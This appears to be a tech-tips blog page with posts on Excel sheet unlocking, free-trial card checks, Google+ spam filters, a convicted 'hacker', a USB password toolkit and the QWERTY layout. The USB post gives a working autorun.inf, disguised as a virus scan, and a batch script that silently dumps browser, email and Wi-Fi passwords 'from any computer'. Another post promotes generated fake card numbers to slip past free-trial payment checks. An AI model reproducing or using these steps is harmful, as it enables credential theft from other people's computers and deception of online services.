How to Find Out Who Blocked or Deleted You on Facebook

Do you find yourself looking at you friend list and asking “who unfriended me?”, “Who deleted me on Facebook?”. Ever asked yourself this question? Through this new tutorial you will find out who deleted you on Facebook.

Update your Facebook status via anything

Update your Facebook status via anything, Update your Facebook status using iPhone, iPhone 6 iPad, Xbox, or BlackBerry without having any of it for real.

Trun your PC into a WiFi HotSpot

Trun your PC into a WiFi HotSpot on windows simply by using Virtual Router Plus, share your internet connection for FREE WiFi Hotspot by Virtual Router Plus

We know what you’re doing: Rise Awareness for Social Networking Privacy

Many people are very open on social networks and spread a little too much their personal life.“We know what you’re doing”is here to sensitize these unwary people.

Track and find your missing computer with Prey

Secure, track and find your missing computer with prey, Free program to track your missing computer, How to track your computer

Tuesday, March 28, 2017

How To Unlock An Excel File Without Password

How To Unlock An Excel File Without Password
In this Tutorial, I will show you How To Unlock an Excel Sheet Without Password. This will work on all Excel versions (2016, 2013, 2010,...).
In case of a password protected worksheet you are unable to edit the data on it. If you have ever forgotten or you don't know the password to unlock this file, you are just in the right place.
So how do you unprotect an Excel file when you don't have the password? Here is a simple and effective solution:

How To Unprotect an Excel Spreadsheet Without Password.

To unlock an Excel file without password, just follow these steps:
  1. Make sure the Excel file is closed then change the file name extension from .xlsx to .zip. Then click "Yes".
How To Unlock An Excel File Without Password 1

  1. Open the .zip file with 7-zip then go to folder xl-> worksheets.
  2. Open sheet1.xml with Wordpad or NotePad.
  3. Press Ctrl + F, and search for "sheetprotection". 
  4. Delete the entire element that starts from "<sheetProtection" to "/>".
How To Unlock An Excel File Without Password 2

  1. Save the modification and close the file. and Click "Ok" when prompted with a warning dialog.
  2. Change back the .zip to .xlsx
  3. Now your Excel file is UNLOCKED, you can open your file and make any modification without any password.

Thursday, March 23, 2017

How To Bypass Credit Card Verification For Free Trials Online

How To Bypass Credit Card Verification For Free Trials Online
Most web services let users have a taste of their services with a free trial, but as you might have faced yourself, Nothing is actually free on the internet. As you sign up for these services you will be eventually asked to enter your credit card details. Its all right if you are genuinely interested in subscribing to that service, but for others who are just trying to have a look, we don’t think its a good idea to provide your credit card details. Its a very sensitive information that can risk your privacy.But there is a workaround to bypass credit card verification for free trials and other services.

In order to avoid giving your real credit card details, you can actually use fake credit numbers instead of your own, and you can do that using the site getcreditcardnumbers.com, which can generate up to 9,999 credit card numbers at a time.

Now, to be completely clear, these numbers cannot be used to purchase any item. For that to work, you would need a valid expiration date and CVV or CSV number. This site merely provides the standard 16 digit credit card number that can be used to bypass certain online forms that only ask for the number.

How Does It Work.

Getcreditcardnumbers.com is a free online service that generates fake credit card numbers using a system based off of the Luhn Algorithm, which has been used to validate numbers for decades. There is nothing alarming here as the service only lets you generate completely random credit card numbers without the corresponding CWW code or expiration date, which is why these credit card numbers are rendered useless for fraud purposes.

Getting a Card Number on Android.

The service has even got an android app, which offers the same functionality as the web service. you can download the app from play store CardGen. You can generate and validate credit card numbers directly from the app, making it easy to use on the go as well.
You can also use this app to check if a credit card is legit or not.

Generate Credit CardGenerate Credit Card

Why My Community Posts on Google+Don't Show UP

Why I Can't See My Google Plus Community Posts

Most people want to share their posts to several communities. One of the issues here is if you also belong to those same Communities you will see the post over and over and over again. A bit spammy and somewhat annoying.

Now for the big mistake. Each time you share the same post it will appear numerous times on your own profile. And if someone is visiting your profile, it looks like sh*t or very, very spammy. Doesn’t encourage me to add you to one of my circles and follow you.

Why Your Posts don't appear on Google+ Communities

If you are wondering why your Google + community posts are not showing up, then this is probably because of the Google+ Spam Filter.

Many people ask why their posts to Google+ communities are flagged as spam by the Google+ spam filters. Google doesn't share details about how the spam filters work (because that would make it easy for spammer to stay just on the legal side of what the filters would block and annoy us all), but we know -- or at least believe we know -- a few things based on observation:

  • Identical or substantially similar posts shared or reshared with multiple communities are more likely to be flagged as spam, especially if they are shared/reshared within a relatively short period of time. To avoid this, I recommend never sharing similar material to more than three communities within about a two-hour period.
  • Posts which contain only links or links with only a minimal amount additional information (also known as "link litter") appear to have a higher probability of being flagged as spam. Such posts violate the rules in many communities. As an aside, there are also strong indications that posts like that also have an extremely low click-through rate.
  • Posts which are identical or similar to posts that have been removed from multiple communities for violating the communities' rules appear to have a higher probability of being flagged as spam. It is extremely important to become familiar with a community's rules before posting in the community because the rules vary significantly between communities, and a pattern of violating the rules in some communities might affect your posts to other communities.
  • Posts containing the same link or similar links (e.g., links to other posts in the same blog) as posts which were previously flagged as spam appear to have a higher probability of being flagged as spam.
  • Posts which are re-shares of non-community public or private posts which were reported as spam appear to have a higher probability of being flagged as spam. Note that selecting the option for email notification when sharing non-community posts can lead people to report the posts as spam because many recipients do not appreciate the unwanted emails. You should virtually never use that option unless people have asked to be notified by email.
  • Posts by individuals who have previously been identified as spammers by the spam filters have a higher probability of being flagged as spam. If you get indications that your posts are being flagged as spam, it is best to review and change your posting habits promptly. The longer you persist in the same behavior, the longer the spam filters appear to treat you as a spammer. In serious cases, it can even lead to your account being suspended or revoked.

What happens if your community posts are flagged as spam

When the Google+ spam filters flag a post as spam, it is held in a moderation queue which is only visible to the community's moderators. The moderators then have three options: Approve, which makes the post visible to all community members; Remove, which removes the post from the community; or to Remove, Report, and Ban, which removes the post from the community, reports it to Google, and removes the user from the community. Banned members cannot join the community again unless and until a moderator removes the ban.

Source: Google+

Tuesday, March 21, 2017

The Sexiest Hacker in the World

The world's sexiest hacker

Kristina Vladimirovna Svechinskaya (Russian: Кристина Владимировна Свечинская, born February 16, 1989) is a former Russian money mule Hacker, has been dubbed the 'World's Sexiest Computer Hacker' after being charged with being part of a gang aiming to steal $220 million and conspiracy to commit bank fraud and false use of passports.

It is alleged that the Russian brunette, used fake passports to open a series of accounts flooded with cash plundered from online bank customers.

From the Original FBI report:
SVECHINSKAYA has allegedly opened at least five accounts under her own name and under the aliases "Anastasia Opokina" and "Svetlana Makarova" at Bank of America and Wachovia, into which over $35,000 was fraudulently deposited, affecting three victims, and from which approximately $11,000 was successfully withdrawn.
Svechinskaya pled guilty on Nov. 19, 2010, and faces up to 40 years in jail.

Thursday, February 23, 2017

How to Hack Passwords using a USB Toolkit

Usb Hacking toolkit

Today I will show you how to create a USB hacking tool to recover any password stored on your computer. Using these tools and a USB Drive, you can create tour own rootkit to sniff passwords from any computer.
The following tools can be very useful if you want to recover your lost passwords.



Build your own Hacking Toolkit.

Step 1:

Download all the Hacking tools that you need.
There are many free password recovery tools for Windows programs including Internet explorer, Google Chrome, Mozilla Firefox, Wireless Network keys, Microsoft Outlook, and more..
All of these tools can run without installation under Windows OS. here are the most useful :

Web Browser Pass viewWebBrowserPassView : is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera. This tool can be used to recover your lost/forgotten password of any Website, including popular Web sites, like Facebook, Yahoo, Google, and GMail, as long as the password is stored by your Web Browser.

Mail PassView : is a small password-recovery tool that reveals the passwords and other account details for the following email clients:
Outlook express, Microsoft Outlook, Windows Mail, IncrediMail, Eudora, Netscape, Mozilla Thunderbird, Group Mail Free, Yahoo! Mail, Hotmail, Gmail...

WirelessKeyView : recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer by the 'Wireless Zero Configuration' service of Windows XP or by the 'WLAN AutoConfig' service of Windows Vista, Windows 7, Windows 8, Windows 10, and Windows Server 2008.

RemotePocketAsterisk : is a small utility that reveals passwords stored behind asterisks (***) in standard thxt-boxes of Pocket PC. This utility doesn't install anything on the Pocket PC device, but instead simply grab the asterisks passwords through the ActiveSync connection.

This unique collection of small and useful freeware utilities are developed by Nir Sofer. You can find more Password Recovery Utilities, Network Monitoring Tools, Internet Related Utilities, MS-Outlook Tools, Command-Line Utilities, and Freeware System Tools by visiting Nirsoft Website.

Step 2:

1- After downloading all tools, extract and copy all the executable (.exe files) into your USB drive.
2- Now open a Notepad and write the following text:
[autorun]open=launch.batACTION= Perform a Virus Scan
3- Save the Notepad as autorun.inf and put it into your USB.
4- Now open another Notepad and copy the following text:
@echo off
start WebBrowserPassView.exe /WebBrowserPassView.txt
start mailpv.exe /mailpv.txt
start WirelessKeyView.exe /WirelessKeyView.txt
5- Save this Notepad as launch.bat and put it in your USB. Please make sure to put the right tool name on the launch.bat file.

Now your rootkit is ready and you are all set to sniff / Hack passwords stored on any computer under Windows OS.

Saturday, June 6, 2015

Put your finger on the screen and get the Golden Touch

Golden Touch Put your finger on the screen and get the Golden Touch
The new music video by J-pop artist Namie Amuro for "Golden Touch", is one simple idea but awesome optical illusion. The concept behind the music video is touch. Just put the video on full screen, and as your finger stays on the screen, the simulated interactive music video let's you a different type of touch.

Thursday, June 4, 2015

Why QWERTY keyboard layout is like this

Christopher SholesYou ever wonder why most keyboards are set up the way they are? Well, It all started with a man named Christopher Sholes. The keyboard that he patented in 1878 is the same one that is widely used today.

His typewriter, the Remington N°2 received a great deal of commercial success. It was successful because it was the first typewriter to offer both upper and lower case letters with the use of the SHIFT key. However, the Remington had an odd layout. Rather than placing letters in alphabetical order, they were put in the QWERTY format.
Why QWERTY keyboard layout is like this. Remington N° 2


Why QWERTY keyboard layout is like this. Remington N° 2
One story says that this was to slow down typist, who had become too fast and had to be slowed down by a new layout. This is not true. This was done in order to speed up typist who were slowed down by paper jams.
By placing commonly used-together letters farther apart, the paper being fed directly underneath the keys would be less likely to jam. Also, the placement is weird, instead of having rows and columns,
the QWERTY keyboard has diagonal rows. The keys were arranged like this to make room for the levers of typewriter.

Why QWERTY keyboard layout is like this. diagonal rows

So, all in all, our computer keyboards are essentially remnants of the past.

Twitter Delicious Facebook Digg Stumbleupon Favorites More